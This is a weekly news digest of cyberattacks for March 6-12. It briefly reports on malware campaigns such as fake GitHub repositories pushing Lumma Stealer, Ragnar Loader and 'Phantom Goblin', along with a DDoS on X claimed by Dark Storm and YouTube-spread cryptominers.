Weekly Summary Cyberattacks march 06-12

Cybercriminals use fake repositories on GitHub to distribute malware   

A malicious campaign is using fake repositories on GitHub to distribute SmartLoader, that subsequently installs Lumma Stealer. Attackers leverage GitHub's trusted reputation and generate content with artificial intelligence to make the repositories appear legitimate, disguising them as tools, hacked software or video game cheats. Victims download ZIP files containing obfuscated scripts, which execute malicious code when extracted. If the attack is successful, cybercriminals can steal credentials, cryptocurrency wallets, personal information and two-factor authentication data, facilitating financial fraud and identity theft. This strategy represents an evolution of previous tactics, moving from the use of GitHub attachments to the creation of repositories complete with AI-generated documentation. 

X suffers a massive cyberattack claimed by Dark Storm 

The social network X (formerly Twitter) suffered a massive cyber-attack on Monday that caused service failures globally. Elon Musk, owner of the platform, confirmed the incident and pointed out that it was an attack with extensive resources, possibly carried out by an organized group or a state. The pro-Palestinian-oriented Dark Storm hacktivist collective claimed credit for the offensive through messages on their Telegram channel, where they shared evidence of the denial-of-service (DDoS) attack. This attack adds to a series of recent offensives by hacktivist groups against major technology platforms. 

Cybercriminals use Ragnar Loader to carry out cyberattacks 

Cybersecurity researchers have identified Ragnar Loader, a sophisticated malware used by groups such as FIN7, FIN8 and Ragnar Locker to maintain access to compromised systems and execute ransomware attacks. This malware is modular and constantly evolves to evade detection. Although it is associated with Ragnar Locker, it is unclear whether the group develops it or rents it to third parties. First documented in 2021, it has been in use since 2020 and has been key in recent attacks, including the distribution of BlackCat ransomware. Ragnar Loader employs PowerShell, advanced encryption and process injection techniques to operate covertly, allowing remote control of the infected system. The malware is distributed in packages with tools for privilege escalation and remote access, facilitating propagation within corporate networks. In addition, it includes a Linux component that enables remote connections, similar to techniques used by other threats such as QakBot. 

“Phantom Goblin” malware alert: stealing credentials and unauthorized remote access   

Cybersecurity researchers have identified a new malware operation dubbed “Phantom Goblin,” which employs social engineering tactics to distribute malware designed to steal credentials and maintain remote access to compromised systems. The attack begins with the distribution of compressed RAR archives containing shortcuts (LNKs) disguised as legitimate documents. Executing these files triggers a PowerShell script that downloads malicious payloads from a repository on GitHub. The malware extracts browser cookies, login credentials and browsing history using advanced techniques to evade detection. It also exploits the Visual Studio Code (VSCode) tunneling feature to establish remote access without raising suspicion. All stolen information is archived and sent covertly to a Telegram bot controlled by the attackers. Experts recommend avoiding opening suspicious files, restricting the use of PowerShell and monitoring unusual activity on networks and applications to mitigate the impact of this threat. 

Cybercriminals use YouTube to distribute malware disguised as a circumvention tool   

A malware campaign has been detected using YouTube to trick users with purported restriction circumvention software. Attackers leverage legitimate network traffic modification tools to insert malicious code, including cryptocurrency miners and remote access Trojans. One of the most notorious cases involves a youtuber with 60,000 subscribers who shared links to infected files in the description of his videos. After reaching over 400,000 views, the description was edited to hide the activity. In addition, the attackers used blackmail tactics, threatening content creators with false reports to force them to spread the malicious files. The distributed malware, an XMRig-based miner, hides in the system and manipulates processes to avoid detection. It only infects devices with Russian IPs and modifies their size to evade automated scans.